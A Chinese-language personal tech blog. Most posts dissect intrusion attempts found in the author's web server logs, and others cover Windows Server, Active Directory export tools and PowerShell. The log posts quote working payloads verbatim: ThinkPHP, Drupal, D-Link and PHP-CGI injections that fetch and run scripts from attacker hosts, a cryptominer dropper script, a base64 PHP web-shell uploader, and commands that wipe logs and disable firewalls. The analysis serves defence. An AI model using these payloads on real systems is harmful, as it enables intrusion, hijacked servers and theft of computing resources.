從 Web Log 學習系統漏洞 29

又是中國的架站套件

從我的 web log 擷取的資料:
205.185.113.123 - - [29/Dec/2018:21:37:59 +0800] "GET /index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp;wget%20http://205.185.113.123/ex.sh;chmod%20777%20ex.sh;sh%20ex.sh HTTP/1.1" 302 388 "-" "Sefa"

利用 thinkphp 這個架站套件漏洞, 企圖下載一個 ex.sh 的程式碼再執行

下載回來ex.sh的內容:

cd /tmp; wget http://205.185.113.123/mcoin; curl http://205.185.113.123/mcoin -O; chmod 777 mcoin; ./mcoin -o 205.185.113.123:3333 -p x -k -a cryptonight -B --max-cpu-usage=95; rm -rf RjsWs

cd /tmp; wget http://205.185.113.123/mcoin-ankit; curl http://205.185.113.123/mcoin-ankit -O; chmod 777 mcoin-ankit; ./mcoin-ankit -o 205.185.113.123:3333 -p x -k -a cryptonight -B --max-cpu-usage=95; rm -rf RjsWs

mv /var/www/html/index.php /var/www/html/elrekt.php

rm -rf /tmp/ex.sh

將一個 mcoin 編碼過的程式下載至暫存目錄, 修改權限到最大再執行, 還會硬操CPU... 估狗了一下這個 mcoin, 一種類似比特幣的虛擬貨幣, 所以可以推論這是一個偷偷植入木馬並且綁架你的電腦當作挖礦機的東西

MiPony 白馬下載器

MiPony 白馬下載器, 一種網路免費空間下載軟體, 支援上百種免費空間下載, 而且還具有續傳功能, 以前使用過免安裝版, 覺得非常方便

1. 官網下載, 支援Windows, Mac, 及 Android 系統

2. 下載完執行安裝

從 Web Log 學習系統漏洞 28

似乎是 Drupal 這個網站架站平台軟體的漏洞攻擊

其中亂碼部分解碼後:
?q=user/password&name[#post_render][]=passthru&name[#type]=markup&name[#markup]=echo PD9waHANCmVjaG8gIlBIUCBVcGxvYWRlciAtIFlhY2luZV9Nb2hhbWVkIjsNCmVjaG8gIjxicj4iLnBocF91bmFtZSgpLiI8YnI+IjsNCmVjaG8gIjxmb3JtIG1ldGhvZD0ncG9zdCcgZW5jdHlwZT0nbXVsdGlwYXJ0L2Zvcm0tZGF0YSc+DQo8aW5wdXQgdHlwZT0nZmlsZScgbmFtZT0nemInPjxpbnB1dCB0eXBlPSdzdWJtaXQnIG5hbWU9J3VwbG9hZCcgdmFsdWU9J3VwbG9hZCc+DQo8L2Zvcm0+IjsNCmlmKCRfUE9TVFsndXBsb2FkJ10pIHsNCiAgaWYoQGNvcHkoJF9GSUxFU1snemInXVsndG1wX25hbWUnXSwgJF9GSUxFU1snemInXVsnbmFtZSddKSkgew0KICBlY2hvICJTdWNjZXNzISI7DQogIH0gZWxzZSB7DQogIGVjaG8gIkZhaWxlZCB0byBVcGxvYWQuIjsNCiAgfQ0KfQ0KPz4= | base64 -d | tee sites/default/files/fuck.php | rm -rf sites/default/files/.htaccess

黑色字為輸入命令, 紅色字大概是什麼東西的金鑰, 企圖植入fuck.php這檔案再刪除.htaccess

網路小白8

類似XAMP這類的架站套裝軟體漏洞還是很多, 而且幾乎都是中國的

1.

安裝Windows Server 2019-Essentials版

雖然 Windows Server 2019 正式版還未開放下載, 不過可以先下載 Essentials 版來玩玩

1. 開始畫面, 由於下載英文版所以語言只有英文可選 (唉, 微軟還是有提供簡體中文版卻沒有繁體中文版...)

2. 開始安裝

MS-Docs Error 404

受不了微軟常常在改網頁, 有些東西改了之後就找不到了

Write-Host 與 Write-Output

在練習 PowerShell 時, 看到兩個很類似的指令: Write-Host 與 Write-Output

查了一下微軟的說明:
Write-Host:

自定義輸出, 可以使用 ForegroundColor 參數指定文字的顏色, 也可以使用 BackgroundColor 參數指定背景顏色, 使用 Separator 參數可以指定一個字串來分隔顯示的物件

Write-Output:

將指定的物件發送到管道中(pipeline)的下一個命令, 如果該命令是管道中的最後一條命令, 則物件將顯示在控制台(console) (就是顯示在畫面上)

Write-Output沿主管道(或稱為"輸出流"或"成功管道")發送物件, 如要將錯誤物件發送到錯誤管道, 則使用Write-Error

此指令通常在腳本中使用, 用以在控制台(console)上顯示字串和其他物件, 但是由於默認行為是在管道的末尾顯示物件, 因此通常不必使用指令, 例如 Get-Process | Write-Output 等於 Get-Process

網路小白7

我網站被攻擊的log

該不會是微信的相關企業吧? 資安做的這麼差.... IP我懶得遮了

網路小白6

本站被攻擊的log

對方網站完全沒設密碼...

將AD (Active Directory) 使用者及群組資料匯出的方法: 4.dsquery

Dsquery, 適用於 Windows Server 2003, Windows Server 2008, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012, Windows Server 2003 SP1, Windows 8

如同 dsget 一樣, dsquery 後面接上 OU 來使用, 例如: dsquery computer, dsquery user 等, 常用 dsquery * 查詢所有資料

雖然 dsquery 匯出的資料格式與 csvde 類似, 不過 dsquery 是用空格來做欄位分隔, 而不像 csvde 使用逗號來做欄位分隔, 利用上比較不方便

1. 使用 dsquery /? 呼叫說明

2. dsquery 指令加上方向(大於)符號可將資料輸出成檔案:
dsquery * OU=ou_name,DC=domain,DC=com > export.csv (或txt)

w-studio.idv.tw

將AD (Active Directory) 使用者及群組資料匯出的方法: 3.dsget

Dsget, 適用於 Windows Server 2003 及 SP1、R2, Windows Server 2008, Windows Server 2012, Windows 8

1. 指令通常會接上其他 OU 使用, 例如: dsget computer, dsget ou, dsget user 等

 w-studio.idv.tw
2. 不過 dsget 通常不會單獨使用, 會搭配 dsquery 再接管線直線符號( | )使用

參考資料: Windows Docs: Dsget

將AD (Active Directory) 使用者及群組資料匯出匯入的方法: 2.Ldifde

Ldifde, 適用於 Windows Server 2003及SP1, Windows Server 2008, Windows Server 2008 R2, Windows Server 2012, Windows 8

指令:
Ldifde [-i] [-f <FileName>] [-s <ServerName>] [-c <String1> <String2>] [-v] [-j <Path>] [-t <PortNumber>] [-d <BaseDN>] [-r <LDAPFilter>] [-p <Scope>] [-l <LDAPAttributeList>] [-o <LDAPAttributeList>] [-g] [-m] [-n] [-k] [-a <UserDistinguishedName> <Password>] [-b <UserName> <Domain> <Password>] [-?]

1. 使用 ldifde /? 呼叫說明

w-studio.idv.tw

將AD (Active Directory) 使用者及群組資料匯出匯入的方法: 1.Csvde

Csvde, 適用於 Windows Server 2003、SP1及 R2, Windows Server 2008及 R2, Windows Server 2012, Windows 8

指令:

Csvde [-i] [-f <FileName>] [-s <ServerName>] [-c <String1> <String2>] [-v] [-j <Path>] [-t <PortNumber>] [-d <BaseDN>] [-r <LDAPFilter>] [-p <Scope] [-l <LDAPAttributeList>] [-o <LDAPAttributeList>] [-g] [-m] [-n] [-k] [-a <UserDistinguishedName> {<Password> | *}] [-b <UserName> <Domain> {<Password> | *}]

1. 使用 csvde /? 呼叫說明

w-studio.idv.tw

AD (Active Directory) User and Computer使用者及電腦資料匯出

學習 Windows Server 2016 的 Active Directory 時, 發現教材上並沒有特別說明如何將 AD 使用者及電腦中的使用者及群組等一些 OU 資料匯出匯入, 而是使用 Windows Server Backup 來備份回復資料, 或是使用 PowerShell 來建立資料, 對於一些初學者來說只是要使用者資料可能會無法了解, 查了一下過去 Windows 2016 以前版本的做法, 有幾個 command-line 工具可以使用

1. Windows Server 的 AD 使用者及電腦中, 只有匯出的功能沒有匯入的功能, 而且欄位資料並不完整

 w-studio.idv.tw

Windows Server 2019

Windows Server 2016 都還沒玩熟咧結果 2019 就出來了, 不過現在好像只有內部工程師可以下載

網路小白5

其實不太想遮他的 IP, 不過他的漏洞實在太大了

網路小白4

這IP今天攻擊了上百筆, 從搜尋的結果這個IP網段包含在澳洲、英國、中國？不能確定是哪來的, 但可以確定的是一個網路小白

網路小白3

從 Web Log 學習系統漏洞 27 -kangle web server

除了 IIS、Apache、nginx 等之類的 web server, 今天認識了新的 kangle(不過也出來很久的樣子), 好像是中國的產品

網路小白2

網路小白又來了, 應該是用XAMPP為基礎的套裝軟體

網路小白

很討厭這種網路小白, 用架站套裝軟體之後也不設定密碼就放著不管, 任由駭客入侵後變成殭屍電腦再去攻擊其他人

這架站套裝軟體跟XAMPP很像

從 Web Log 學習系統漏洞 26

來自捷克使用Linux系統的Router Webserver, 嘗試下載 avtech 這個程式(指令), 變更權限後再執行

77.240.102.116 - - [18/Oct/2018:08:46:34 +0800] "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin%20;XmlAp%20r%20Account.User1.Password%3E$(cd%20/tmp;%20wget%20http://209.141.40.213/avtech%20-O%20niXd;%20chmod%20777%20niXd;%20sh%20niXd)&password=admin HTTP/1.1" 400 226 "-" "Sefa"

下載來的 avtech 中的內容:
cd /tmp; wget http://209.141.40.213/bins/sefa.arm; chmod 777 sefa.arm; ./sefa.arm avtech.arm; rm -rf sefa.arm

內容表示繼續從同一個IP:209.141.40.213下載 sefa.arm 這個編碼過的程式然後執行

經掃描結果確定為後門

Youtube掛了

記得多年前遇到Youtube網站掛了找猴子修, 沒想到今天網站突然掛了也是找猴子修 😂😂, 還多了猴子圖片😆😆

從 Web Log 學習系統漏洞 25-1

這兩天埃及人對我網站很有興趣...

41.44.204.188 - - [15/Oct/2018:21:31:31 +0800] "GET /login.cgi?cli=aa ;wget" 400 226 "-" "-"
197.58.70.109 - - [15/Oct/2018:21:59:29 +0800] "GET /login.cgi?cli=aa ;wget" 400 226 "-" "-"
41.34.99.205 - - [16/Oct/2018:09:24:12 +0800] "GET /login.cgi?cli=aa ;wget" 400 226 "-" "-"
41.42.219.91 - - [16/Oct/2018:09:41:19 +0800] "GET /login.cgi?cli=aa ;wget" 400 226 "-" "-"
41.39.25.24 - - [16/Oct/2018:11:21:35 +0800] "GET /login.cgi?cli=aa ;wget" 400 226 "-" "-"
41.39.25.24 - - [16/Oct/2018:11:21:38 +0800] "GET /login.cgi?cli=aa ;wget" 400 226 "-" "-"
41.39.25.24 - - [16/Oct/2018:11:21:44 +0800] "GET /login.cgi?cli=aa ;wget" 400 226 "-" "-"

從 Web Log 學習系統漏洞 25

今天的東西很有趣, 雖然用跟之前同樣的方式入侵, 不過這次發現居然連HTTP_USER_AGENT也能附帶指令.

先從80.211.203.234下載程式bin, 執行後再刪除所有執行紀錄, 再幫你把防火牆給關了, 不過這個80.211.203.234的站似乎連不上啊

219.110.165.8 - - [15/Oct/2018:09:29:41 +0800] "GET /login.cgi?cli=aa%20aa%27;wget%20http://80.211.203.234/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 226 "-" "Hakai/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"

從 Web Log 學習系統漏洞 24

雖然使用了套件模組阻擋了一堆phpmyadmin的DDos偵測攻擊, 不過對方還是能持續連線, 而不能直接阻擋連線, 算了, 反正對方也連不進來

36.106.84.60 - - [09/Oct/2018:17:32:27 +0800] "GET /device_description.xml HTTP/1.1" 404 220 "-" "-"
似乎是一款"Sonos bridge"的分享器漏洞

36.106.84.60 - - [09/Oct/2018:17:32:28 +0800] "GET /cgi-bin/user/Config.cgi?.cab&action=get&category=Account.* HTTP/1.1" 403 232 "-" "-"
"AVTECH IP Camera"網路攝影機漏洞? 連這東西也被當成跳板了?

212.237.44.126 - - [10/Oct/2018:10:56:44 +0800] "POST /_vti_bin/_vti_aut/author.dll HTTP/1.1" 403 237 "-" "core-project/1.0"
好像是古老的 Windows NT 及 IIS 漏洞?

試用 XAMPP-7.2.10

之前試用過XAMPP這套裝架站軟體, 雖然很方便所有伺服器都打包在一起不用另外在一一比對相容性, 但是發現這東西有不少漏洞, 以常常跑來我網站的入侵紀錄來看, 有不少網站是用這軟體架站, 漏洞沒補就被人入侵利用拿來當跳板了, 不過新版的似乎把這些漏洞補起來了, 開啟首頁不會直接連到管理頁面

軟體版本編號現在似乎是跟著PHP的版本號(7.2.10), 不過內部使用介面時又變成另一個(3.2.2), 真讓人搞混

1. 安裝方式跟之前一樣

2. 選擇要安裝的Server及工具

維基百科變成一言堂？

先說明我沒有做過什麼事, 是今天看維基想要編輯時才發現

應該不是針對我, 只是剛好我的IP在他限制網段之內

不過也太誇張, 居然把整個網段都封了, 連註冊帳號也不行

最近被DDos攻擊爆量

之前雖然封了所有的連線方式只留GET下來, 不過還是擋不下連續連線(類似DDos), 一個IP一分鐘內上百個連線, 主要都是在測試資料庫或phpmyadmin, 雖然以前就有發現一個可以擋瞬間大量連線的模組mod_limitipconn, 不過他沒有支援到最新版的阿帕契

有興趣的可以去看看
http://dominia.org/djao/limitipconn.html

從 Web Log 學習系統漏洞 23

限制了 HTTP request method 之後少掉了不少蒼蠅, 不過還有一個還沒想到該怎擋, 每天一堆隨機IP也不曉得是不是真的

:
156.202.37.153 - - [18/Aug/2018:18:44:30 +0800] "GET /login.cgi?cli=aa%20aa%27;wget%20http://80.211.67.245/k%20-O%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$ HTTP/1.1" 400 226 "-" "LMAO/2.0"

:

183.102.221.196 - - [19/Aug/2018:15:17:44 +0800] "GET /login.cgi?cli=aa%20aa%27;wget%20http://209.141.33.86/d%20-O%20-%3E%20/tmp/ff;sh%20/tmp/ff%27$ HTTP/1.1" 400 226 "-" "Gemini/2.0"

從 Web Log 學習系統漏洞 22

在網站設定上一直沒有阻擋全部的HTTP連線方式(GET, POST, HEAD, PROPFIND...), 不過每天上百個測試連線垃圾Log實在看了很煩, 決定還是擋一擋, 果然清靜不少

很好奇的反連今天跑來測試我網站的IP, 應該是被漏洞入侵的路由器, 然後被當成跳板?殭屍? 再連來我的網站測試

對方IP的Router登入介面

Router機器的官網

從 Web Log 學習系統漏洞 21

估狗不到是什麼, 這入侵攻擊竟能回傳200正常回應

195.250.98.130 - - [07/Aug/2018:10:00:57 +0800] "POST //?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=curl+-o+sites/default/files/wolf.php+'http://djcaa.org/tes.aff' HTTP/1.1" 200 3554 "-" "libwww-perl/6.15"

從 Web Log 學習系統漏洞 20

Fckeditor (現改為CKEditor) 漏洞攻擊？

185.234.218.153 - - [02/Aug/2018:18:12:51 +0800] "GET //admin/images/cal_date_over.gif HTTP/1.1" 404 228 "-" "python-requests/2.19.1"
185.234.218.153 - - [02/Aug/2018:18:14:23 +0800] "GET //admin/login.php HTTP/1.1" 404 213 "-" "python-requests/2.19.1"
185.234.218.153 - - [02/Aug/2018:18:15:23 +0800] "GET //templates/system/css/system.css HTTP/1.1" 404 229 "-" "python-requests/2.19.1"
185.234.218.153 - - [02/Aug/2018:18:15:53 +0800] "GET / HTTP/1.1" 200 3554 "-" "python-requests/2.19.1"
185.234.218.153 - - [02/Aug/2018:18:16:25 +0800] "GET //fckeditor/editor/filemanager/connectors/php/upload.php?Type=Media HTTP/1.1" 404 252 "-" "python-requests/2.19.1"

從 Web Log 學習系統漏洞 19

139.219.100.104 - - [23/Jul/2018:17:23:26 +0800] "POST //%63%67%69%2D%62%69%6E/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1" 404 209 "-" "-"

轉碼後:
"POST //cgi-bin/php?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -d auto_prepend_file=php://input -n HTTP/1.1"

從 Web Log 學習系統漏洞 18

不知是什麼鬼, 最近來很多
好像是 D-Link DSL-2750B 的漏洞遠端攻擊
https://www.exploit-db.com/exploits/44760/

156.218.224.172 - - [22/Jul/2018:08:47:24 +0800] "GET /login.cgi?cli=aa%20aa%27;wget%20http://g.mariokartayy.com/x%20-O%20-%3E%20/tmp/x;sh%20/tmp/x%27$ HTTP/1.1" 400 226 "-" "Gemini/2.0"
41.44.216.34 - - [22/Jul/2018:09:05:27 +0800] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.172.164.41/e%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 226 "-" "Hakai/2.0"
41.238.160.154 - - [22/Jul/2018:09:25:18 +0800] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.172.164.41/e%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 226 "-" "Hakai/2.0"
156.203.54.57 - - [22/Jul/2018:11:34:41 +0800] "GET /login.cgi?cli=aa%20aa%27;wget%20http://g.mariokartayy.com/x%20-O%20-%3E%20/tmp/x;sh%20/tmp/x%27$ HTTP/1.1" 400 226 "-" "Gemini/2.0"
156.203.54.57 - - [22/Jul/2018:11:34:50 +0800] "GET /login.cgi?cli=aa%20aa%27;wget%20http://g.mariokartayy.com/x%20-O%20-%3E%20/tmp/x;sh%20/tmp/x%27$ HTTP/1.1" 400 226 "-" "Gemini/2.0"
197.32.107.117 - - [22/Jul/2018:16:34:49 +0800] "GET /login.cgi?cli=aa%20aa%27;wget%20http://g.mariokartayy.com/x%20-O%20-%3E%20/tmp/x;sh%20/tmp/x%27$ HTTP/1.1" 400 226 "-" "Gemini/2.0"

使用MDT(Microsoft Deployment Toolkit)部署安裝Windows OS - 2.用戶端安裝 Windows Server 2016

很可惜 MDT 還無法使用完全網路自動化安裝, 如果要用網路自動化安裝就要搭配 WDS(Windows Deployment Services)

預先準備: 帶有ADDS, DNS, DHCP的伺服器及MDT伺服器, 以便網路連線安裝

1. 以Hyper-V 新增一部測試安裝的用戶端VM, 將複製來的 LiteTouchPE_x64.iso 設定到光碟映像, 並設定以光碟機開機

2. 開機之後會進入到 MDT 的部署程序

使用MDT(Microsoft Deployment Toolkit)部署安裝Windows OS - 1.安裝MDT及設定(以Windows Server 2016為例)

MDT (Microsoft Deployment Toolkit)是適用於自動執行桌面與伺服器部署的整合工具、程序及指導方針的集合, 除了減少部署時間並將桌面和伺服器映像標準化之外, MDT 讓您能夠更輕鬆地管理安全性和持續進行的設定, MDT 建置於 Windows 評定及部署套件 (Windows ADK) 中核心部署工具的頂端, 並具備設計來降低在企業環境中部署所需之複雜度與時間的其他指導方針和功能, MDT 支援 Windows 10 以及 Windows 7、Windows 8、Windows 8.1 和 Windows Server 2012 R2 的部署(Windows Server 2016也可)

只是現階段 MDT 只有英文版, 而且需自行下載安裝...
https://docs.microsoft.com/zh-tw/sccm/mdt/

1. 開始安裝 Microsoft Deployment Toolkit

2. 接受使用授權